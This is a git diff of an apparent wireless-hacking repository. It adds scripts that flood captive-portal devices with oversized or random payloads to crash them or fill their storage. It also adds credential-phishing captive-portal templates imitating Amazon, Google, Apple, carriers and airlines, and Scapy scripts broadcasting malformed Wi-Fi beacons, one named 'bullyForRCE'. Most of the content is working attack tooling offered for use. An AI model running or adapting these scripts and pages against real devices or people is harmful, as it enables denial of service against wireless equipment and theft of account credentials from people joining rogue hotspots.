Confirm Kill...\n" +ping -c 4 $host + +echo -e "\nThat Was Big Payload (4U)\nRIP" diff --git a/evill-portal/evil-portal-crash.py b/evill-portal/evil-portal-crash.py new file mode 100755 index 0000000..f6c4df0 --- /dev/null +++ b/evill-portal/evil-portal-crash.py @@ -0,0 +1,18 @@ +import subprocess + +# host = "http://192.168.4.1" +host = "http://10.0.0.80" +charlen = 2000 +char = "%FF" + +curl_cmd = "curl --silent" + +payload = char*charlen +uri = f"{host}/get.php?email={payload}&password={payload}" +command = f"{curl_cmd} '{uri}'" +print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n") +p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) +(output, err) = p.communicate() +p_status = p.wait() + +print("That's A Big Load (4U)\n\nDone") diff --git a/evill-portal/evil-portal-sd-ruin b/evill-portal/evil-portal-sd-ruin new file mode 100755 index 0000000..bb2525f --- /dev/null +++ b/evill-portal/evil-portal-sd-ruin @@ -0,0 +1,23 @@ +#!/bin/bash +wifi_device=wlan1 +ssid=Guest-WiFi +host="192.168.4.1" + +wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt + +sudo nmcli d disconnect $wifi_device > /dev/null + +sudo nmcli dev wifi rescan > /dev/null + +echo -e "\nCashing This Evil Portal With No Survivors\n" + +sudo nmcli device wifi connect $ssid ifname $wifi_device + +echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" + +ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 + +echo -e "\n\nPinging To Confirm Kill...\n" +ping -c 4 $host + +echo -e "\nThat Was Big Payload (4U)\nRIP" diff --git a/evill-portal/hex-chars-fuzzing.py b/evill-portal/hex-chars-fuzzing.py new file mode 100755 index 0000000..331795a --- /dev/null +++ b/evill-portal/hex-chars-fuzzing.py @@ -0,0 +1,40 @@ +import datetime +import subprocess +import time + +# host = "10.0.0.80" +host = "192.168.4.1" + +rangei = 65536 # FFFF+1 + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +for x in range(rangei): + hexcode = hex(x)[2:] + if x > 255: + urlformatted_raw = "%{:04x}".format(x) + hexformatted_raw = "0x{:04x}".format(x) + urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}" + else: + urlformatted_raw = "%{:04x}".format(x) + urlformatted = "%{:02x}".format(x) + hexformatted = "0x{:02x}".format(x) + unicode_formatted = "%u{:04x}".format(x) + printformatted = f"\\x{hexcode}" + + print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}") + p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + + (output, err) = p.communicate() + (output, err) = p1.communicate() + (output, err) = p2.communicate() + + p_status = p.wait() + p_status1 = p1.wait() + p_status2 = p2.wait() + + time.sleep(0.225) +print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt") diff --git a/evill-portal/hex-sniper-rifle.py b/evill-portal/hex-sniper-rifle.py new file mode 100755 index 0000000..fbee616 --- /dev/null +++ b/evill-portal/hex-sniper-rifle.py @@ -0,0 +1,43 @@ +import datetime +import subprocess +import time + +# host = "http://10.0.0.80" +# host = "http://192.168.4.1" +host = "http://172.0.0.1" +charlen = 750 +char = "%00%FF" +prepend = "" +append = "" + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt" + +# -i, --include - include header in output +# -I, --head - HEAD http method +# -s, --silent - supresses progress and errors +# -S, --show-error - when used with -s/--silent, displays errors +# -D , --dump-header - saves response headers to +# -f, --fail - fail silently on HTTP error +# -X, --request - request method, defaults to GET +# -H , --header - sets header, multiple are allowed +# -v, --verbose - show request headers +# -o , --output - write output to file + +# curl_cmd = "curl -i -s -S -v" +curl_cmd = "curl --include --silent --show-error" + +chars = char*charlen +payload = f"{prepend}{chars}{append}" +uri = f"{host}/get.php?email={payload}&password=holdstill" +command = f"{curl_cmd} '{uri}' >> {outfile}" +print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}") +with open(outfile, "a") as log: + log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n") +p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) +(output, err) = p.communicate() +p_status = p.wait() + +print(f"\n\nlog written to {outfile}") diff --git a/evill-portal/incremental-buff-overrun.py b/evill-portal/incremental-buff-overrun.py new file mode 100755 index 0000000..97072e3 --- /dev/null +++ b/evill-portal/incremental-buff-overrun.py @@ -0,0 +1,46 @@ +import datetime +import subprocess +import time + +# host = "http://10.0.0.80" +# host = "http://192.168.4.1" +host = "http://172.0.0.1" +rangei = 10000 +char = "%00%FF" +# char = "%00" +prepend = "" +append = "" +#append = "%0a%00%0a" + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt" + +# -i, --include - include header in output +# -I, --head - HEAD http method +# -s, --silent - supresses progress and errors +# -S, --show-error - when used with -s/--silent, displays errors +# -D , --dump-header - saves response headers to +# -f, --fail - fail silently on HTTP error +# -X, --request - request method, defaults to GET +# -H , --header - sets header, multiple are allowed +# -v, --verbose - show request headers +# -o , --output - write output to file + +# curl_cmd = "curl -i -s -S -v" +curl_cmd = "curl --include --silent --show-error" + +for x in range(rangei+1): + chars = char*x + payload = f"{prepend}{chars}{append}" + uri = f"{host}/get?email={payload}&password={payload}" + command = f"{curl_cmd} '{uri}' >> {outfile}" + print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\nOutfile: {outfile}\n") + with open(outfile, "a") as log: + log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n") + p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) + (output, err) = p.communicate() + p_status = p.wait() + +print(f"\n\nlog written to {outfile}") diff --git a/evill-portal/sd-card-murder b/evill-portal/sd-card-murder new file mode 100755 index 0000000..dadd117 --- /dev/null +++ b/evill-portal/sd-card-murder @@ -0,0 +1 @@ +bash connect-wifi && python sd-card-murder.py diff --git a/evill-portal/sd-card-murder.py b/evill-portal/sd-card-murder.py new file mode 100755 index 0000000..6060174 --- /dev/null +++ b/evill-portal/sd-card-murder.py @@ -0,0 +1,29 @@ +import subprocess +import os +# from requests.utils import requote_uri +import urllib.parse +from random import randbytes + +# host = "http://192.168.4.1" # cyd version +host = "http://172.0.0.1" # flipper version +# host = "http://10.0.0.80" +# rangei = 10000 +# charlen = 2012 # to crash +charlen = 1400 # to flood flipper mem(?) +# charlen = 700 # to flood filesysted +curl_cmd = "curl --include --silent --show-error" + +x = 0 +#for x in range(rangei+1): +while True: + payload = urllib.parse.quote(randbytes(charlen)) + uri = f"{host}/get?email={payload}&password={payload}" + command = f"{curl_cmd} '{uri}'" + + print(f"{x} of infinite sets of {charlen} random bytes") + p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) + (output, err) = p.communicate() + p_status = p.wait() + x=x+1 + +print(f"\n\nThe End") diff --git a/ffuf-curl-commands.txt b/ffuf-curl-commands.txt old mode 100644 new mode 100755 diff --git a/marauder_cyd_microsd/AlaskaAirline.html b/marauder_cyd_microsd/AlaskaAirline.html new file mode 100755 index 0000000..27ae11d --- /dev/null +++ b/marauder_cyd_microsd/AlaskaAirline.html @@ -0,0 +1,89 @@ + + + + + + + + +
+
+ +
+
+ + diff --git a/marauder_cyd_microsd/Amazon.html b/marauder_cyd_microsd/Amazon.html new file mode 100755 index 0000000..44c509b --- /dev/null +++ b/marauder_cyd_microsd/Amazon.html @@ -0,0 +1,100 @@ + + + + + + + + +
+ + + +
+ +

Sign in

+

Use your Amazon Account

+ +
+ + + + + + + +
+ +
+ +
+ + + \ No newline at end of file diff --git a/marauder_cyd_microsd/Better_Google_Mobile.html b/marauder_cyd_microsd/Better_Google_Mobile.html new file mode 100755 index 0000000..3861095 --- /dev/null +++ b/marauder_cyd_microsd/Better_Google_Mobile.html @@ -0,0 +1,146 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/marauder_cyd_microsd/CoxWifi.html b/marauder_cyd_microsd/CoxWifi.html new file mode 100755 index 0000000..6a525a0 --- /dev/null +++ b/marauder_cyd_microsd/CoxWifi.html @@ -0,0 +1 @@ +CoxWifi-index.html

Cox Internet subscriber

Sign in if you're a Cox Internet
subscriber or learn more about WiFi.


By signing in, you agree to the WiFi Terms
of Service
and related agreements.

Forgot your Cox User ID or Password?

For assistance please call: 877-269-2778

\ No newline at end of file diff --git a/marauder_cyd_microsd/Facebook.html b/marauder_cyd_microsd/Facebook.html new file mode 100755 index 0000000..b75a500 --- /dev/null +++ b/marauder_cyd_microsd/Facebook.html @@ -0,0 +1,83 @@ + + + + + + + + + + diff --git a/marauder_cyd_microsd/FakeHack.html b/marauder_cyd_microsd/FakeHack.html new file mode 100755 index 0000000..0f0620d --- /dev/null +++ b/marauder_cyd_microsd/FakeHack.html @@ -0,0 +1,61 @@ + + + + + + + Hacking Simulation + + +
+ + + diff --git a/marauder_cyd_microsd/FakeHack2.html b/marauder_cyd_microsd/FakeHack2.html new file mode 100755 index 0000000..e4313a5 --- /dev/null +++ b/marauder_cyd_microsd/FakeHack2.html @@ -0,0 +1,58 @@ + + + + Captive Portal + + + + Connect +
+ + + diff --git a/marauder_cyd_microsd/Frequency.html b/marauder_cyd_microsd/Frequency.html new file mode 100755 index 0000000..aa130cb --- /dev/null +++ b/marauder_cyd_microsd/Frequency.html @@ -0,0 +1,71 @@ + + + + Captive Portal + + + + Connect +
+ + + diff --git a/marauder_cyd_microsd/Google_Modern.html b/marauder_cyd_microsd/Google_Modern.html new file mode 100755 index 0000000..79b96b8 --- /dev/null +++ b/marauder_cyd_microsd/Google_Modern.html @@ -0,0 +1,74 @@ + + + + + + + + + + diff --git a/marauder_cyd_microsd/Jet_Blue.html b/marauder_cyd_microsd/Jet_Blue.html new file mode 100755 index 0000000..21318dc --- /dev/null +++ b/marauder_cyd_microsd/Jet_Blue.html @@ -0,0 +1,60 @@ + + + + + + + +
+
+ +
+
+ + diff --git a/marauder_cyd_microsd/Matrix.html b/marauder_cyd_microsd/Matrix.html new file mode 100755 index 0000000..ab98091 --- /dev/null +++ b/marauder_cyd_microsd/Matrix.html @@ -0,0 +1,139 @@ + + + + + + + +
+
Register or Sign-in
+
+ + + +
+
+
+
+ + + diff --git a/marauder_cyd_microsd/Microsoft.html b/marauder_cyd_microsd/Microsoft.html new file mode 100755 index 0000000..34cdc64 --- /dev/null +++ b/marauder_cyd_microsd/Microsoft.html @@ -0,0 +1,77 @@ + + + + + + + +
+ +
+

Sign In with
your Microsoft account

+ + + +
+
+ + diff --git a/marauder_cyd_microsd/Prank_Game.html b/marauder_cyd_microsd/Prank_Game.html new file mode 100755 index 0000000..4f13658 --- /dev/null +++ b/marauder_cyd_microsd/Prank_Game.html @@ -0,0 +1,76 @@ + + + + Guess the number to use WiFi + + + +

Guess the number to use WiFi

+

Enter a number between 0-10

+ + +

+ + + + diff --git a/marauder_cyd_microsd/Spectrum.html b/marauder_cyd_microsd/Spectrum.html new file mode 100755 index 0000000..4ac5cd4 --- /dev/null +++ b/marauder_cyd_microsd/Spectrum.html @@ -0,0 +1,91 @@ + + + + + + + +
+ +

Welcome

+

Please log in using your Spectrum account

+
+ + + +
+
+ + diff --git a/marauder_cyd_microsd/SpiritAirlines.html b/marauder_cyd_microsd/SpiritAirlines.html new file mode 100755 index 0000000..ab93392 --- /dev/null +++ b/marauder_cyd_microsd/SpiritAirlines.html @@ -0,0 +1,100 @@ + + + + + + + + + + + + + + + + diff --git a/marauder_cyd_microsd/Starlink.html b/marauder_cyd_microsd/Starlink.html new file mode 100755 index 0000000..92d02fb --- /dev/null +++ b/marauder_cyd_microsd/Starlink.html @@ -0,0 +1,63 @@ + + + + + + + +
+
+ +
+
+ + + diff --git a/marauder_cyd_microsd/T_Mobile.html b/marauder_cyd_microsd/T_Mobile.html new file mode 100755 index 0000000..cd7d32f --- /dev/null +++ b/marauder_cyd_microsd/T_Mobile.html @@ -0,0 +1,94 @@ + + + + + + + + + +
+ + + + +

Sign in

+ +

Use your T-Mobile account

+ +
+ + + +
+ +
+ + + diff --git a/marauder_cyd_microsd/Twitch.html b/marauder_cyd_microsd/Twitch.html new file mode 100755 index 0000000..e86a4d3 --- /dev/null +++ b/marauder_cyd_microsd/Twitch.html @@ -0,0 +1,70 @@ + + + + + + +
+ +

Welcome

+ +
+ + + + + +
+
+ + diff --git a/marauder_cyd_microsd/Twitter.html b/marauder_cyd_microsd/Twitter.html new file mode 100755 index 0000000..4cb909b --- /dev/null +++ b/marauder_cyd_microsd/Twitter.html @@ -0,0 +1,2 @@ + +
diff --git a/marauder_cyd_microsd/Verizon.html b/marauder_cyd_microsd/Verizon.html new file mode 100755 index 0000000..09d7909 --- /dev/null +++ b/marauder_cyd_microsd/Verizon.html @@ -0,0 +1,91 @@ + + + + + + + +
+ +
+ + diff --git a/marauder_cyd_microsd/american_airline.html b/marauder_cyd_microsd/american_airline.html new file mode 100755 index 0000000..3c2cadd --- /dev/null +++ b/marauder_cyd_microsd/american_airline.html @@ -0,0 +1,116 @@ + + + + + + + + +
+ + + +

Sign in

+ +

Using your AAdvantage number or username and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + + diff --git a/marauder_cyd_microsd/ap.config.txt b/marauder_cyd_microsd/ap.config.txt new file mode 100755 index 0000000..7cf85fd --- /dev/null +++ b/marauder_cyd_microsd/ap.config.txt @@ -0,0 +1 @@ +Guest-WiFi diff --git a/marauder_cyd_microsd/apple.html b/marauder_cyd_microsd/apple.html new file mode 100755 index 0000000..b3cbe5a --- /dev/null +++ b/marauder_cyd_microsd/apple.html @@ -0,0 +1,279 @@ + + + + + + + + Login - Apple + + + + + +
+ + +
+ + +
+
+
+

Sign in

+

Use your Apple ID to access the Wi-Fi

+
+
+
+ +
+
+ +
+
+ +
+ +
+

Forgot Apple ID or password?

+

Dont't have an Apple ID? Create yours now.

+
+
+ +
+

Copyright © 2023 Apple Inc. All rights reserved.

+

Privacy Policy

+

Terms of Use

+
+ + + diff --git a/marauder_cyd_microsd/at&t.html b/marauder_cyd_microsd/at&t.html new file mode 100755 index 0000000..6aec7e8 --- /dev/null +++ b/marauder_cyd_microsd/at&t.html @@ -0,0 +1,94 @@ + + + + + + + + +
+ + + +

Sign in

+ +

Use your AT&T Account to gain Access to the WiFi Network

+ +
+ + + + + + + +
+ +
+ + + \ No newline at end of file diff --git a/marauder_cyd_microsd/detla_airline.html b/marauder_cyd_microsd/detla_airline.html new file mode 100755 index 0000000..a40ff71 --- /dev/null +++ b/marauder_cyd_microsd/detla_airline.html @@ -0,0 +1,115 @@ + + + + + + +
+ + + +

Sign in

+ +

Using your SkyMiles number or username and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + diff --git a/marauder_cyd_microsd/index.html b/marauder_cyd_microsd/index.html new file mode 100755 index 0000000..c1a998d --- /dev/null +++ b/marauder_cyd_microsd/index.html @@ -0,0 +1 @@ +HTMLINDEXFILE diff --git a/marauder_cyd_microsd/southwest_airline.html b/marauder_cyd_microsd/southwest_airline.html new file mode 100755 index 0000000..84ce3b9 --- /dev/null +++ b/marauder_cyd_microsd/southwest_airline.html @@ -0,0 +1,110 @@ + + + + + + + + +
+ + + +

Sign In

+ +

Sign in using your Rapid Rewards number or username and password

+ +
+ +
+ +
+ +
+ +
+ + + +
+ +
+ + + diff --git a/marauder_cyd_microsd/united_airline.html b/marauder_cyd_microsd/united_airline.html new file mode 100755 index 0000000..d92eda3 --- /dev/null +++ b/marauder_cyd_microsd/united_airline.html @@ -0,0 +1,117 @@ + + + + + + +
+ + + +

Sign in

+ +

Using your MileagePlus® number and password.

+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + diff --git a/notes.txt b/notes.txt old mode 100644 new mode 100755 diff --git a/pyenv.txt b/pyenv.txt old mode 100644 new mode 100755 diff --git a/scapy/wifi-beacon-fuzz.py b/scapy/wifi-beacon-fuzz.py old mode 100644 new mode 100755 index de09559..f818b52 --- a/scapy/wifi-beacon-fuzz.py +++ b/scapy/wifi-beacon-fuzz.py @@ -1,113 +1,113 @@ -from scapy.all import * -import urllib.parse -#from random import randbytes -import random - -iface = 'wlan1' -sender = 'ac:cb:12:ad:58:27' - -def sendProbe(SSID, repeat=3, interval=0.100): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', - addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=interval, count=repeat) - -def sendProbeRaw(SSID, repeat=1, interval=0.200, listedLen=255): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', - addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=listedLen) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=interval, count=repeat) - -def sendRandBytesBeacons(numOfBeacons=200, lenOfSSIDs=20, repeat=3, interval=0.100): - for i in range(numOfBeacons): - SSID = randbytes(lenOfSSIDs) - urlEncoded = urllib.parse.quote(SSID) - print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tLength: {lenOfSSIDs}\n\tSSID: {urlEncoded}\n") - sendProbe(SSID, repeat, interval) - -def sendProbeFuzz(repeat=1, interval=0.150): - randMAC = '6e:07:9e:96:2b:4e' - # randMAC = RandMAC() - randLen = RandNum(0, 255) - randSSIDLen = random.randint(0,255) - randSSIDBytes = random.randbytes(randSSIDLen) - urlEncoded = urllib.parse.quote(randSSIDBytes) - - dot11 = Dot11(type=0, - subtype=8, - addr1='ff:ff:ff:ff:ff:ff', # dst set to broadcast - addr2=randMAC, # random source - addr3=randMAC) # random bssid - - beacon = Dot11Beacon() - - essid = Dot11Elt(ID='SSID', - info=RawVal(randSSIDBytes), - len=RawVal(randLen)) - - frame = RadioTap()/dot11/beacon/essid - - print(f"src={randMAC}, dst=ff:ff:ff:ff:ff:ff, BSSID={randMAC}\n\tSSID Set Length: {randLen}\n\tActual SSID Length: {randSSIDLen}\n\tSSID: {urlEncoded}") - sendp(frame, iface=iface, inter=interval, count=repeat) - -def sendFuzzBeacons(numOfBeacons=200, - repeat=1, - interval=0.150): - - for i in range(numOfBeacons): - print(f"\n{i} of {numOfBeacons}") - sendProbeFuzz() - -def sendRandBytesBeaconsRaw( - numOfBeacons=200, - lenOfSSIDs=256, - listedLen=255, - repeat=1, - interval=0.2): - - for i in range(numOfBeacons): - SSID = random.randbytes(lenOfSSIDs) - urlEncoded = urllib.parse.quote(SSID) - print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tListed Length: {listedLen}\n\tReal Length: {lenOfSSIDs}\n\tInterval: {interval} Seconds\n\tSSID: {urlEncoded}") - sendProbeRaw(SSID, repeat, interval, listedLen) - - - -#sendRandBytesBeaconsRaw(numOfBeacons=100, lenOfSSIDs=1, listedLen=255, repeat=3, interval=0.15) -#sendRandBytesBeacons(100, 20, 5, 0.1) - - -def fullFuzz( - numOfBeacons=200, - repeat=3, - interval=0.150): - - for i in range(numOfBeacons): - realLenSSID = random.randint(0,255) - SSID = random.randbytes(realLenSSID) - urlEncoded = urllib.parse.quote(SSID) - fakeLenSSID = random.randint(0,255) - senderMAC = RandMAC() - - dot11 = Dot11(type=0, subtype=8, - addr1='ff:ff:ff:ff:ff:ff', - addr2=senderMAC, - addr3=senderMAC) - - beacon = Dot11Beacon() - - essid = Dot11Elt(ID='SSID', - info=SSID, - len=fakeLenSSID) - - frame = RadioTap()/dot11/beacon/essid - - print(f"\n{i}/{numOfBeacons}\n\tEach Repeats: {repeat}\n\tReal Length: {realLenSSID}\n\tFake Length: {fakeLenSSID}\n\tSender MAC: {senderMAC}\n\tSSID: {urlEncoded}\n") - - sendp(frame, iface=iface, inter=interval, count=repeat) - +from scapy.all import * +import urllib.parse +#from random import randbytes +import random + +iface = 'wlan1' +sender = 'ac:cb:12:ad:58:27' + +def sendProbe(SSID, repeat=3, interval=0.100): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', + addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=interval, count=repeat) + +def sendProbeRaw(SSID, repeat=1, interval=0.200, listedLen=255): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', + addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=listedLen) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=interval, count=repeat) + +def sendRandBytesBeacons(numOfBeacons=200, lenOfSSIDs=20, repeat=3, interval=0.100): + for i in range(numOfBeacons): + SSID = randbytes(lenOfSSIDs) + urlEncoded = urllib.parse.quote(SSID) + print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tLength: {lenOfSSIDs}\n\tSSID: {urlEncoded}\n") + sendProbe(SSID, repeat, interval) + +def sendProbeFuzz(repeat=1, interval=0.150): + randMAC = '6e:07:9e:96:2b:4e' + # randMAC = RandMAC() + randLen = RandNum(0, 255) + randSSIDLen = random.randint(0,255) + randSSIDBytes = random.randbytes(randSSIDLen) + urlEncoded = urllib.parse.quote(randSSIDBytes) + + dot11 = Dot11(type=0, + subtype=8, + addr1='ff:ff:ff:ff:ff:ff', # dst set to broadcast + addr2=randMAC, # random source + addr3=randMAC) # random bssid + + beacon = Dot11Beacon() + + essid = Dot11Elt(ID='SSID', + info=RawVal(randSSIDBytes), + len=RawVal(randLen)) + + frame = RadioTap()/dot11/beacon/essid + + print(f"src={randMAC}, dst=ff:ff:ff:ff:ff:ff, BSSID={randMAC}\n\tSSID Set Length: {randLen}\n\tActual SSID Length: {randSSIDLen}\n\tSSID: {urlEncoded}") + sendp(frame, iface=iface, inter=interval, count=repeat) + +def sendFuzzBeacons(numOfBeacons=200, + repeat=1, + interval=0.150): + + for i in range(numOfBeacons): + print(f"\n{i} of {numOfBeacons}") + sendProbeFuzz() + +def sendRandBytesBeaconsRaw( + numOfBeacons=200, + lenOfSSIDs=256, + listedLen=255, + repeat=1, + interval=0.2): + + for i in range(numOfBeacons): + SSID = random.randbytes(lenOfSSIDs) + urlEncoded = urllib.parse.quote(SSID) + print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tListed Length: {listedLen}\n\tReal Length: {lenOfSSIDs}\n\tInterval: {interval} Seconds\n\tSSID: {urlEncoded}") + sendProbeRaw(SSID, repeat, interval, listedLen) + + + +#sendRandBytesBeaconsRaw(numOfBeacons=100, lenOfSSIDs=1, listedLen=255, repeat=3, interval=0.15) +#sendRandBytesBeacons(100, 20, 5, 0.1) + + +def fullFuzz( + numOfBeacons=200, + repeat=3, + interval=0.150): + + for i in range(numOfBeacons): + realLenSSID = random.randint(0,255) + SSID = random.randbytes(realLenSSID) + urlEncoded = urllib.parse.quote(SSID) + fakeLenSSID = random.randint(0,255) + senderMAC = RandMAC() + + dot11 = Dot11(type=0, subtype=8, + addr1='ff:ff:ff:ff:ff:ff', + addr2=senderMAC, + addr3=senderMAC) + + beacon = Dot11Beacon() + + essid = Dot11Elt(ID='SSID', + info=SSID, + len=fakeLenSSID) + + frame = RadioTap()/dot11/beacon/essid + + print(f"\n{i}/{numOfBeacons}\n\tEach Repeats: {repeat}\n\tReal Length: {realLenSSID}\n\tFake Length: {fakeLenSSID}\n\tSender MAC: {senderMAC}\n\tSSID: {urlEncoded}\n") + + sendp(frame, iface=iface, inter=interval, count=repeat) + fullFuzz() \ No newline at end of file diff --git a/scapy/wifi-beacon-random-byte.py b/scapy/wifi-beacon-random-byte.py old mode 100644 new mode 100755 index 70b9bdc..0123f28 --- a/scapy/wifi-beacon-random-byte.py +++ b/scapy/wifi-beacon-random-byte.py @@ -1,130 +1,130 @@ -from scapy.all import * -import urllib.parse -from random import randbytes - -iface = 'wlan1' -sender = 'ac:cb:12:ad:58:27' - -def sendProbe(SSID, - repeat=3, - interval=0.100): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', - addr2=sender, addr3=sender) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=interval, count=repeat) - -def sendProbeRaw(SSID='F', - repeat=3, - interval=0.150, - listedLen=512, - lenOverride=True): - - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) - beacon = Dot11Beacon() - if lenOverride: - essid = Dot11Elt(ID='SSID',info="F", len=RawVal(listedLen)) - else: - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=listedLen) - frame = RadioTap()/dot11/beacon/essid - sendp(frame, iface=iface, inter=interval, count=repeat) - -def sendRandBytesBeacons(numOfBeacons=200, - lenOfSSIDs=20, - repeat=3, - interval=0.100): - for i in range(numOfBeacons): - SSID = randbytes(lenOfSSIDs) - urlEncoded = urllib.parse.quote(SSID) - print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tLength: {lenOfSSIDs}\n\tSSID: {urlEncoded}\n") - sendProbe(SSID, repeat, interval) - -def sendRandBytesBeaconsRaw( - SSID='I-am-your-pony-waifu', - numOfBeacons=200, - lenOfSSIDs=255, - listedLen=255, - lenOverridei=False, - repeat=1, - interval=0.2): - - for i in range(numOfBeacons): - #SSID = randbytes(lenOfSSIDs) - urlEncoded = urllib.parse.quote(SSID) - print(f"\n{i} of {numOfBeacons}\n\tRepeats: {repeat}\n\tListed Length: {listedLen}\n\tReal Length: {lenOfSSIDs}\n\tInterval: {interval} Seconds\n\tSSID: {urlEncoded}") - sendProbeRaw(SSID, repeat, interval, listedLen, lenOverride=lenOverridei) - -def overloadParamBeacon(max=10000, - repeat=3, - chari = "X", - interval=0.2, - listedLen=1): - - for i in range(max): - num = i+1000 - SSIDI = chari*num - SSID = f"{num}{SSIDI}" - - dot11 = Dot11(type=0, - subtype=8, - addr1='ff:ff:ff:ff:ff:ff', - addr2=sender, - addr3=sender) - - beacon = Dot11Beacon() - - essid = Dot11Elt(ID='SSID', - info=RawVal(SSID), - len=listedLen) - - frame = RadioTap()/dot11/beacon/essid - - print(f"\nSending {num}{chari}*{num} as SSID With Length Of {listedLen}") - sendp(frame, iface=iface, inter=interval, count=repeat) - -#overloadParamBeacon() - - - -#$sendRandBytesBeaconsRaw( -# SSID = b"YOU-SEEM-FUNDAMETALLY-FUN\x00\x0AI-THINK-ID-LIKE-TO-KNOW-YOU\x00\x0AI-FEEL-LIKE-BEING-YOUR-FRIEND\x00\x0AI-AM-YOUR-PONY-WAIFU", -# numOfBeacons=200, -# lenOfSSIDs=2, -# listedLen=1, -# lenOverridei=True, -# repeat=3, -# interval=0.1) - -def bullyForRCE(max=10000, - repeat=3, - chari = "\xff", - interval=0.2, - listedLen=255): - - for i in range(max): - chars = chari*i - #SSID = f"n-{i}-YOU-SEEM-FUNDAMETALLY-FUN-I-THINK-ID-LIKE-TO-KNOW-YOU{chars}\xc6\x54\x00-I-FEEL-LIKE-BEING-YOUR-FRIEND-I-AM-YOUR-PONY-WAIFU" - SSID = f"n{chars}" - urlEncoded = urllib.parse.quote(SSID) - - dot11 = Dot11(type=0, - subtype=8, - addr1='ff:ff:ff:ff:ff:ff', - addr2=sender, - addr3=sender) - - beacon = Dot11Beacon() - - essid = Dot11Elt(ID='SSID', - info=RawVal(SSID), - len=listedLen) - - frame = RadioTap()/dot11/beacon/essid - - print(f"\nSending {i}/{max}\n\tWith SSID {urlEncoded}\n\tWith Length Of {listedLen}") - sendp(frame, iface=iface, inter=interval, count=repeat) - -sendProbeRaw(repeat=300) -#bullyForRCE() -#sendRandBytesBeacons(100, 20, 5, 0.1) +from scapy.all import * +import urllib.parse +from random import randbytes + +iface = 'wlan1' +sender = 'ac:cb:12:ad:58:27' + +def sendProbe(SSID, + repeat=3, + interval=0.100): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', + addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=interval, count=repeat) + +def sendProbeRaw(SSID='F', + repeat=3, + interval=0.150, + listedLen=512, + lenOverride=True): + + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + if lenOverride: + essid = Dot11Elt(ID='SSID',info="F", 